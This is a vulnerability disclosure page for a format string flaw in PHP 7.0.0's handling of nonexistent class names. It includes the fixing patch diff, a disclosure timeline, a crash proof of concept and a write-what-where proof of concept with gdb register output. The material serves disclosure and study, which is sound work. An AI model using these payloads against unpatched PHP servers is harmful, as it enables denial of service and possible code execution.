Format String Vulnerability in PHP 7.0.0

vendor:

PHP

by:

Andrew JMPESP

7,5

CVSS

HIGH

Format String Vulnerability

134

CWE

Product Name: PHP

Affected Version From: 7.0.0

Affected Version To: 7.0.0

Patch Exists: YES

Related CWE: N/A

CPE: a:php:php:7.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

Format String Vulnerability in PHP 7.0.0

A fun little format string vulnerability exists in PHP 7.0.0 due to how non-existent class names are handled. From my limited research, it is believed that this issue is likely exploitable for full code execution. This issue does not appear to be present in previous PHP versions and has been patched in version 7.0.1.

Mitigation:

Upgrade to PHP 7.0.1 or later

Source

Exploit-DB raw data:

Overview
--------------------------------------------
A fun little format string vulnerability exists in PHP 7.0.0 due to how 
non-existent class names are handled.  From my limited research I 
believe this issue is likely exploitable for full code execution (see 
test script below).  This issue does not appear to be present in 
previous PHP versions and has been patched in version 7.0.1.  If you 
build a working exploit, drop me a line, I'd love to see (andrew at 
jmpesp dot org).  Shout out to the PHP team for fixing this so quickly 
and for building a great product.  Greetz to my DSU crew.



Timeline
--------------------------------------------
12/11/2015: Discovered
12/12/2015: Reported to PHP team
12/13/2015: Patch accepted and committed
12/17/2015: PHP 7.0.1 released containing patch
12/22/2015: Publicly disclosed



Vulnerability/Patch
--------------------------------------------
diff -rup php-7.0.0_old/Zend/zend_execute_API.c 
php-7.0.0_new/Zend/zend_execute_API.c
--- php-7.0.0_old/Zend/zend_execute_API.c	2015-12-01 07:36:25.000000000 
-0600
+++ php-7.0.0_new/Zend/zend_execute_API.c	2015-12-12 12:24:24.999391117 
-0600
@@ -218,7 +218,7 @@ static void zend_throw_or_error(int fetc
  	zend_vspprintf(&message, 0, format, va);

  	if (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) {
-		zend_throw_error(exception_ce, message);
+		zend_throw_error(exception_ce, "%s", message);
  	} else {
  		zend_error(E_ERROR, "%s", message);
  	}



Proof of Concept #1 (simple segfault)
--------------------------------------------
<?php $name="%n%n%n%n%n"; $name::doSomething(); ?>



Proof of Concept #2 (write-what-where primitive)
--------------------------------------------
andrew@thinkpad /tmp/php-7.0.0_64 % cat /tmp/test.php
<?php
ini_set("memory_limit", "4G"); // there's probably a much cleaner way to 
do this
$rdx = 0x42424242; // what
$rax = 0x43434343; // where
$name = "%" . ($rdx - 8) . "d" . "%d" . "%n" . str_repeat("A", ($rax - 
34)); // your offsets may differ.
$name::doSomething();
?>

andrew@thinkpad /tmp/php-7.0.0_64 % gdb sapi/cli/php
GNU gdb (GDB) 7.10
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later 
<http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show 
copying"
and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from sapi/cli/php...done.
(gdb) r /tmp/test.php
Starting program: /tmp/php-7.0.0_64/sapi/cli/php /tmp/test64.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x0000000000672935 in xbuf_format_converter 
(xbuf=xbuf@entry=0x7fffffffa610, is_char=is_char@entry=1 '\001', 
fmt=<optimized out>, ap=0x7fffffffa658)
     at /tmp/php-7.0.0_64/main/spprintf.c:744
744						*(va_arg(ap, int *)) = is_char? (int)((smart_string 
*)xbuf)->len : (int)ZSTR_LEN(((smart_str *)xbuf)->s);
(gdb) i r
rax            0x43434343	1128481603
rbx            0x7fffb2800016	140736188121110
rcx            0x6e	110
rdx            0x42424242	1111638594
rsi            0x7fffffff9db0	140737488330160
rdi            0x7fffffffa658	140737488332376
rbp            0x1	0x1
rsp            0x7fffffff9d50	0x7fffffff9d50
r8             0x7fffffff9db0	140737488330160
r9             0x7fffb2800016	140736188121110
r10            0x0	0
r11            0x0	0
r12            0x20	32
r13            0x7fffffffa610	140737488332304
r14            0x0	0
r15            0x4242423a	1111638586
rip            0x672935	0x672935 <xbuf_format_converter+1845>
eflags         0x10202	[ IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) x/1i $rip
=> 0x672935 <xbuf_format_converter+1845>:	mov    DWORD PTR [rax],edx
(gdb)